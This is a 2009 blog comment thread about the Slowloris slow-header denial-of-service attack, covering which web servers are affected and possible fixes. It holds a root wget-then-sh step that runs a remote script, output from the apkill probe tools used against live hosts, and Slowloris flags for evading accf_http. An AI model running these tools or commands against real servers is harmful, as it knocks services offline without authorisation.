In a web application server as described above, if the requests queue for an ip address fills up, further requests from the same ip will be rejected with a timeout error which will inform legitimate browsers (even if they are behind forward/reverse proxies) to retry the request again. Other clients like your slowloris will just get a whole bunch of timeout errors without blocking access to the web application for other clients.

Apache falls for this hack simply because it does not serialize requests. So in a certain sense, it is indeed an architectural flaw in apache.
# RLoxley Says:
June 19th, 2009 at 6:55 pm

Can i use this to hack hotmail? woohhooo, haha
# Phil D Says:
June 19th, 2009 at 7:22 pm

What about mod_limitipconn? Could you give it a test run?

Apache 1.x: dominia.org/djao/limitipconn.html
Apache 2.x: dominia.org/djao/limitipconn2.html
# adrianilarionciobanu Says:
June 19th, 2009 at 11:55 pm

there always was a tool (and some detailed description) here: pub.mud.ro/~cia/computing/apache-httpd-denial-of-service-example.html smile (with small compiletime errors explicitely coded)
anyway i was more fed up with the antiddos business morons that can (and usually will) kill your business faster than 1000 script kiddies working together.
that was just an example of attack that most of antiddos gurus wont be able to stop very soon.
# Wietse Wind Says:
June 20th, 2009 at 2:14 am

Here's a quick and easy 'fix' using iptables, cron and netstat (and wget to install). This will probably run on about any Linux-webserver.

sudo -i
cd /tmp/
wget hosting.servxs.net/files/install-antiloris.sh
/bin/sh install-antiloris.sh
exit

Source:
Install script: hosting.servxs.net/files/install-antiloris.sh
Antiloris script: hosting.servxs.net/files/antiloris.txt

Good luck!
# B10m Says:
June 20th, 2009 at 4:09 am

RSnake, on the slowloris page you mention:

“Requirements: This is a PERL program requiring the PERL interpreter”

Please, please, please! Perl is not an acronym. So to be correct, it'd be “Requirements: This is a Perl program requiring perl (the Perl interpreter)”.

faq.perl.org/perlfaq1.html#What_s_the_differenc
# Eghie Says:
June 20th, 2009 at 6:08 am

IPtables should block it, via hitcount, if the source is a single IP:

iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –set
iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –update –seconds 60 –hitcount 20 -j LOG
iptables -A INPUT -p tcp –dport 80 -m state –state NEW -m recent –update –seconds 60 –hitcount 20 -j DROP
iptables -A INPUT -p tcp –dport 80 -j ACCEPT

If the source is a botnet with different IP's this will not help.

Throw before a reverse proxy like Perlbal or Varnish. I don't know if they are vurneable anyway, just need to check that out as well. But I guess they will allow you more requests to handle.
# Mike Adewole Says:
June 20th, 2009 at 7:11 am

@Phil D: mod_limitipconn won't help much if Apache attempts to read the request headers before calling this module. And your check_limit function (yes, I read the code) will misbehave unless the content type is available.

Also, I see no thread synchronization in this function, so the loop that calculates ip_count could have race issues in multithreaded versions of Apache.

Anyway, in order to defeat Slowloris, serialization has to happen based on information from the tcp connection itself (eg the client ip address and/or port) without reading any part of the request beforehand.
# RSnake Says: RSnake říká:
June 20th, 2009 at 8:01 am

@B10m - PERL is a hold over from how I originally learned it as “ Practical Extraction and Report Language .” Yes, I was taught it incorrectly - that it actually was an acronym. I've been programming a very very long time, and old habits are hard to break. But yes, you're right. But seriously, who gives a crap?
# adrianilarionciobanu Says:
June 20th, 2009 at 8:34 am

there are no quick and easy fixes. not for apkill, at least. for slowloris - lots, since its singlesourced. slowloris's “dos” mode is easy to filter even by just doing a per-ip con limit with ipfw/ipt. apkill's “ddos” mode … well … will just kill your apache or any other tcp service, if specially crafted for another tcp service. but any other type of ddos will kill you as well. the difference that apkill makes is that it simulates perfectly a real visitor (well… tons of them). but it can be stopped 101% with a little bit of coding “on the bright side” and with very small chances of killing real visitors (it really depends on the speed of the attack)

anyway, i still don't get it why is this regarded as a “bug” after all these years … even after thousands of years of being used as an exploit on humans - starvation. its not the technique that is different, but the target. all we do is to apply these kind of patterns that are deeply hidden in our perverted minds ;)

what do i think this is?
first its pure marketing - the simple possibility of a threat catches you - the end user - in the web. remember, remember, remember. i reloaded the cisco/microsoft dns case on slashdot comments (how they decided that this is the time-to-market for an old, already fixed bug mentioned by djb years ago) but the people are just so focused on this “new exploit” that they come blind… you are not really being threaten by anything,at least not unless you are really becoming a victim - and unless you are doing dirty business you are unlikely to become one. you are just being paranoid.
second is “la guerre pour reconaissance” that isnt that bad as it may sound, in fact this is what drives us to discover more bs (excuse my language)
# adrianilarionciobanu Says:
June 20th, 2009 at 12:22 pm

Suricou(@Digg) made a nice timeline on the topic: digg.com/security/Apache_HTTP_DoS_tool_released
# RSnake Says: RSnake říká:
June 20th, 2009 at 12:38 pm

@adrianilarionciobanu - Cool, although I certainly didn't rip off the code. This was the first I've heard of it and until Amit's email I thought I was the first one to talk about it. Of course I now know that was an incorrect assumption even though we did quite a bit of research and never found another DoS tool like it in the public domain. I'd love to see a copy of his code though. In a cursory check on a few search engines I didn't see it laying about.
# adrianilarionciobanu Says:
June 20th, 2009 at 12:55 pm

nono, you're missing the point. i wasn't sure why now, why not earlier, why never. until Suricou told me about anoctopus.c and the recent IFPI/Maqs attack (that as far as i understand was linked to the piratebay case). Now i did not personally check the anoctopus.c source code to see if they used the same technique but if this is the case then my theory verifies. The exploit has no value until a big victim will arise (this case) or a big player decides its time for some other well-thought reason … and that's when the marketing comes to do the real hack. We're just being played here. Well there's at least one thing that i am certain of, my paranoia is healthier than others ;)
# adrianilarionciobanu Says:
June 20th, 2009 at 2:31 pm

if this is “the” anoctopus.c: ja.pastebin.ca/1439176 then it has nothing to do with the real technique: coded in a rush and it doesnt exploit fully the “capabilities” of an apache server ;) plus from what i know close() on a socket sends a FIN … this code was written by a gentleman smile.

everything related to apkill is public domain (at the url mentioned earlier somewhere above).
if you want to test,
0. make sure you have state-threads.sf.net , modify compile.sh and strun.sh to reflect the correct paths
1. 1. make sure you resolve perl deps before sucking links / generating C header
2. 2. dont get scared about apfinger/chinese_death compile time errors, they're supposed to be there. chinese_death is supposed to die at runtime unless a one line fixer.
3. 3. some of the infos on running killap target from the webpage are mistaken - one should read some of the source code to realize whats going on. can't just release turnkey solution or ill get to smell toilets.

just to test that a website is vulnerable its enough to run ap_finger/chinese_death. first digs the timeout setuped on server side, second is testing if the timeout is “properly” reset when seding a small random byte quantity to the server.

output snips (i just made sure this thing is still running cuz i didnt touch it in more than 2 years):

localhost d # ./ap_finger www.example.com 80
resolving timeout on connection to www.example.com:80, this may take a while depending on remote server setup
wrote 3 bytes to net bufs, waiting on local buffers to flush … buffers flushed to net!
waiting on remote timeout …
error returned as expected,timeout=60 seconds, error_code=0, error_msg=”Success”

localhost d # ./chinese_death www.example.com 80 60
resolving timeout on connection to www.example.com:80, this may take a while depending on remote server setup
starting:
sending 2 bytes to target, memcpy from addr 0
timeout almost reached, write_to_net next 2 bytes SENT: “GE” at 1245533151
sleeping 45 seconds before refreshing buffers…
sleep_done, continue
sending 2 bytes to target, memcpy from addr 2
timeout almost reached, write_to_net next 2 bytes SENT: “T ” at 1245533196
sleeping 42 seconds before refreshing buffers…
sleep_done, continue
sending 4 bytes to target, memcpy from addr 4
timeout almost reached, write_to_net next 4 bytes SENT: “//wh” at 1245533238
^C

conclusion: example.com is vulnerable
# rvdh Says: rvdh říká:
June 20th, 2009 at 11:53 pm

@Roland Dobbins

I concur with your thoughts, attacks on the TCP/IP stack is in my opinion that gets shoved under the rug, since we all know (or reasonably theoretically assume) that it's virtually impossible to stop a denial of service attacks due to architecture and nature of how clients and servers operate. I understand the standpoint of Apache as well since it's really tough material and it's easy to make very bad decisions in proposing “fixes”, it's in the same league as cryptography as far as I'm concerned, because what you fix in one place you leave open in other places, I'm sure some would propose big buffers and what not, creating new problems on top of the issues at hand. That said, I'm more concerned in crashing a kernel with lingering connections by sending a perpetual FIN-WAIT-2, something inherently insecure KeepAlive connections and yet no one talks about that, because again, you won't solve these kind of attacks in fixing this as an individual case, since in the 9 states the TCP datagram goes through there are more theoretical attacks than I can roll my dice on. It's like plugging holes in your boat with shotgun ammo.

Interesting nonetheless, but at the end of the day a DOS can be accomplished on pretty much every box, with some luck with minor resources, with less luck you just resort to your resources in the old fashioned way.

;)
# RSnake Says: RSnake říká:
June 21st, 2009 at 9:19 am

Stevan Bajic helped me test and confirm that nginx in a default configuration is vulnerable as well. It required tuning the options slightly (-timeout 20 -num 3000) but it was actually a worse effect than normal and actually kept the machine down for far longer than the attack itself. It was down even minutes later.

EDIT: nevermind - this was due to the log directory itself having been full. False positive!
# adrianilarionciobanu Says:
June 21st, 2009 at 12:06 pm

@RSnake
i don't think its a false positive. nginx is a lady and promptly resets the timer on the next byte(s) received.
i ran a nginx with defaults few minutes ago (./nginx -p ../ where ../ is build root)

localhost objs # HEAD localhost:80 |grep -E '^Server:'
Server: nginx/0.8.3

cia@localhost ~/dev/d $ ./ap_finger 127.0.0.1 80
resolving timeout on connection to 127.0.0.1:80, this may take a while depending on remote server setup
wrote 2 bytes to net bufs, waiting on local buffers to flush … buffers flushed to net!
waiting on remote timeout …
error returned as expected,timeout=60 seconds, error_code=0, error_msg=”Success”

cia@localhost ~/dev/d $ ./chinese_death localhost 80 60
resolving timeout on connection to localhost:80, this may take a while depending on remote server setup
starting:
sending 4 bytes to target, memcpy from addr 0
timeout almost reached, write_to_net next 4 bytes SENT: “GET ” at 1245610849
sleeping 55 seconds before refreshing buffers…
sleep_done, continue
sending 2 bytes to target, memcpy from addr 4
timeout almost reached, write_to_net next 2 bytes SENT: “//” at 1245610904
sleeping 50 seconds before refreshing buffers…
sleep_done, continue
sending 2 bytes to target, memcpy from addr 6
timeout almost reached, write_to_net next 2 bytes SENT: “im” at 1245610954
# adrianilarionciobanu Says:
June 21st, 2009 at 12:36 pm

i got tricked as well by the client_header_timeout directive.
it seems that indeed nginx does not reset the timer but will kill the connection few seconds a little bit later on the next bytes received after the timer expired
setting up client_header_timeout to 10 seconds allowed me to send few bytes in a 12 seconds interval but on the next sending i went bananas. not sure if the tcp stack that announced me later or the timer is checked only on the next receive but i doubt the second case.

i apologize for spamming with a false alarm
# adrianilarionciobanu Says:
June 21st, 2009 at 12:40 pm

sorry, i got it. its the tcp stack that tries to resend (i got some bytes still queued in the kernel buffers when that shouldnt happen unless the peer doesnt care about me, nginx prolly doesnt care to announce immediately a timeout which is nice) and the timer is respected properly. nice pěkný ;)
# adrianilarionciobanu Says:
June 21st, 2009 at 1:06 pm

hoping that helps you, at least to confirm or question already made tests:

nginx 0.8.3 - NOT vulnerable
cherokee 0.99.17 - NOT vulnerable

lighttpd 1.4.20 - vulnerable
apache 2.2.11 - vulnerable

im really sorry for nginx false alert. i really liked it for correctly ignoring me. cherokee made a friendly tcp annoucement that he's gonna quit ;)
# adrianilarionciobanu Says:
June 21st, 2009 at 1:24 pm

boa - vulnerable
zeus - vulnerable (i was forced to test www.zeus.com. no harm done.)
# adrianilarionciobanu Says:
June 21st, 2009 at 1:54 pm

sun web server - vulnerable (tested remote same as zeus)

on the remote tests - not 100% assured, normally one only needs to guess the timers and then check if it is being reset “properly”. if the timers seems to be reset then normally my connection shouldnt be killed too soon even if the case of a big server load - i can assume starvation will happen. but i may be wrong.
# Nick Lowe Says:
June 22nd, 2009 at 2:35 am

Please could you explain why you consider Squid to be vulnerable?

I posted to their Bugzilla and got the following response:

“Thank you for the info and pointer.

I find it interesting that the article mentions Squid in the threaded web
server section. They seem not to have all their facts lined up right.

Squid does not use threads beyond the basic one every app has, and has long
provided a number of mechanisms for protection against these types of attack.
Parallel POSTs does seem to be a new approach to the old problem though.

As they do mention “This also may not work if there is an upstream device that
somehow limits/buffers/proxies HTTP requests” …such as Squid.

If you are able to do any requests testing on current Squid we will be
grateful. It is one of the areas lacking in test info presently.

This issue can easily be avoided by reducing the request_timeout and
read_timeout settings from minutes to a number of seconds. Also increasing the
max_filedescriptors or ulimit. Operations which are routinely tuned by
administrators.”
# Nick Lowe Says:
June 22nd, 2009 at 2:35 am

www.squid-cache.org/bugs/show_bug.cgi?id=2694
# Daniel H. Says:
June 22nd, 2009 at 3:08 am

Apache 2.2 Patch witch works :

This patch is available under the following URL: synflood.at/tmp/anti-slowloris.diff.

Testet Aganst Apache 2.2.10 on a gentoo system.
# JY Says:
June 22nd, 2009 at 11:30 am

@Daniel H.
The link you provided doesn't work.
# adrianilarionciobanu Says:
June 22nd, 2009 at 12:00 pm

@JY: delete the '.' at the end
# adrianilarionciobanu Says:
June 22nd, 2009 at 12:54 pm

@Nick Lowe:
squid - NOT vulnerable
i just tested it
# adrianilarionciobanu Says:
June 22nd, 2009 at 1:05 pm

anyway i think testing http services is useless and will just piss off people. can't really blame for example apache for being … politically correct as i commented on
isc.sans.org/diary.html?storyid=6613
# adrianilarionciobanu Says:
June 22nd, 2009 at 1:07 pm

fingerprinting and vulnerability test available for download (as were done in 2007, output a little bit beautified and dropped the compile time errors - useless now)

pub.mud.ro/~cia/files/deadsnail/

the ddos tool not cleanedup but still avail from old url
# RSnake Says: RSnake říká:
June 22nd, 2009 at 1:07 pm

@All - I will get to squid in a bit but I wanted to update regarding the MPM Event module: httpd.apache.org/docs/2.2/mod/event.html

So we installed it (we already had worker installed but not event). And it worked as advertised - sorta. Once we set Slowloris to -timeout 10 -num 7000 the test site went up and down frequently. So if you can get over the fact that it is “experimental, so it may or may not work as expected” and the fact that “MPM is incompatible with mod_ssl, and other input filters” and the fact that it's still vulnerable but recovers occasionally… it's a pretty good module at keeping your site up some of the time.

IIS on the other hand still has no problems with that same configuration in Slowloris. I still believe IIS has a better model than mpm_event_module.
# adrianilarionciobanu Says:
June 22nd, 2009 at 1:27 pm

@RSnake:
event is for keepalives as far as i know but you can still maxout the fdmax or if you run for cgis would be easier. as for worker mpm - the policy is the same as for preforks, isnt it? re, timeouts - being reset the same way on first byte received. you just have to reach maxthreads instead of maxprocs now.
# S. Says:
June 22nd, 2009 at 1:38 pm

FYI: I made some tests slowloris on some WAF(based on apache) and it failed too.
….
Let the sun shine !
# RSnake Says: RSnake říká:
June 22nd, 2009 at 2:22 pm

@All - Good writeup on stopping Slowloris with Cisco's CSS:
www.cupfighter.net/index.php/2009/06/slowloris-css/

@S. - Which WAF broke? That's interesting!
# hanabokuro Says:
June 23rd, 2009 at 2:19 am

I think “AcceptFilter http httpready” will protect from slowloris if your OS is FreeBSD.
Linux doesn't support accf_http kernel module.
# S. Says:
June 23rd, 2009 at 2:39 am

@rsnake: drop me an email to have explanation first
# Robert A Says:
June 23rd, 2009 at 8:27 am

isc.sans.org/diary.html?storyid=6622
# RSnake Says: RSnake říká:
June 23rd, 2009 at 12:13 pm

@hanabokuro - yes, try the -httpready switch in Slowloris to get around accf_http (also known as HTTPReady).
# John Terrill Says:
June 23rd, 2009 at 7:07 pm

There has been far too much media coverage of this attack.

We have known about this issue for a long time which is why a number of load balancers and scalable infrastructures work the way they do. I mean, its text book denial of service… Not to mention that commercial sites at a high risk to these types of attacks have already implemented protections and monitor traffic well enough that they would just block connections fitting the types of traffic patterns.

Another thing that seems to be exaggerated here is how impactful this attack is. Its not like taking down a web server nets you much. Where is the access to trusted resources or ability to run arbitrary code?

Now there are outrageous accusations like Iran stating that CNN is trying to teach people how to take down their web servers(http://edition.cnn.com/2009/WORLD/meast/06/22/cnn.iran.claim/index.html). This could have been played very differently and explained more responsibly when explaining the actual risk.

When discussing the media attention surrounding this DoS POC - to quote Family Guy, “this makes about as much sense as Beowulf having sex with Robert Fulton at the First Battle of Antietam”.
# hanabokuro Says:
June 23rd, 2009 at 8:09 pm

@rsnake - thank info.
hmm. accf_http only work with GET & HEAD.
Why accf_http doesn't support POST or other request ?

I tested lighttpd. lighttpd is vulnerable.
lighttped has max connection limit. It depend on FD_SETSIZE(max number of file descripter per process).
lighttped use one fd for connection to client and use one fd for read HTML file.
So. ligttpd's max connection limit is FD_SETSIZE(default is 1024) / 2.

'slowloris.pl -num 600′ can do DOS against lighttpd.
# hanabokuro Says:
June 23rd, 2009 at 9:07 pm

I tested lighttpd again.
“server.max-worker” config setting worked well.
lighttpd can handle (FD_SETSIZE / 2) * “server.max-worker” connections.
lighttpd is still vulnerable. but become little harder to do DOS.
Attacker need to more connection to do DOS. it mean easy to detect attack.

I'll change my server to “lightttpd(reverse proxy mode) apache”
with “sever.max-work = 256″ at lighttpd.conf and “MaxClients 256″.
# RSnake Says: RSnake říká:
June 24th, 2009 at 7:47 am

@John Terrill - Surely you aren't claiming that I am somehow to blame for Iran's distaste for CNN's coverage of an DDoS attack (not DoS) that pre-dates my release of the tool by nearly a week, right? That's a bit of a stretch. And if it's a textbook DoS attack, how is this tool any more of an issue than we had before? If you're simply saying it shouldn't have gotten news coverage, you and I are in agreement. Although I will disagree with your assessment that DoS gives you nothing - please read the two other blog posts on this site regarding DoS over the past month.

I just want Apache to fix their problem. A problem that you rightly said has been fixed by other inline devices and webservers for eons - but not by Apache. I wouldn't have released Slowloris at all if Apache had given me more than a 20 word response indicating that they even cared, or had a reasonable fix forthcoming. I have a feeling the Apache guys are taking their disclosure cues from their Google brethren - it smacks of the same holier than though entitlement BS, instead of willingness to cooperate and work with the user community and admitting that that have problems. Instead they're happy enough to pass the blame onto the network for not compensating for their architectural issues and saying it's old news and fixed by a module that doesn't fix the problem (and breaks other stuff in the process). That's a much easier fix than actually fixing it, isn't it?

Incidentally, if anyone can find a link to the original article that Iran is upset about, I'd be curious to read it.
# RSnake Says: RSnake říká:
June 24th, 2009 at 8:19 am

@All - just got word of mod_antiloris hmnet.nl/mod_antiloris-0.1.zip We have not evaluated it yet, and may not have time to today. Comments welcome.
# adrianilarionciobanu Says:
June 24th, 2009 at 9:14 am

@John Terril : I totally agree with you. If someone can start a war these days then the name is media. Anyway, the original article was meant to proove the exact opposite: that (some of the) companies that promise protection against dos/ddos are bs-ing the customers. And now … it is indeed an exaggeration for the sake of the effect - meant to hit the lines. The worst thing is that only few people see that …
# adrianilarionciobanu Says:
June 24th, 2009 at 9:18 am

So if someone (lets say the dude that started it) can stop this circus some people would be grateful. There's no bug, there is no flaw. Understand that. Its just a way to exploit friendly neighbours. Like in our daily lives.
# adrianilarionciobanu Says:
June 24th, 2009 at 10:00 am

… and @RSnake: if I would be an apache developer to take the decision on this then there would be no fix. Same for any other services marked as vulnerable. vulnerability does not always translate into a bug. If i am going to have my teeth spread all over the parking lot because of some incident with the gangs, for being too friendly and for not wearing a football helmet … well …

my question is this: WHERE do you see a bug in apache? it does it right. nginx doesnt (for example, nor cherokee and that saved their butter) but these days the right thing is the wrong thing and the wrong thing is the right thing. apache did enough by implementing accept filters. its true that accf_http will do more harm than good if ddosed and that doesnt support POST but think of what POST is (as length) but one can write another filter.
i believe that if someone (like apache) will act on this and “fix” it - that will be a mistake.
# adrianilarionciobanu Says:
June 24th, 2009 at 10:48 am

mod_antiloris - definetely not fixing the problem. i read the source code.

i must explain the problem:

1. 1. there is a Timeout setting that should define how long should a connection be kept open while trying to receive the full request from client
2. 2. if the Timeout is 30 seconds but i keep sending one byte just one second before the timer expires, the timer is going to be reset. that will allow me to keep the connection open indefinitely long.

fixing the problem:

1. 1. don't reset the timer, it should be kept the


Nový komentář

Téma:
Jméno:
Notif. e-mail *:
Komentář:
  [b] [obr]
Odpovězte prosím číslicemi: Součet čísel jedna a sedm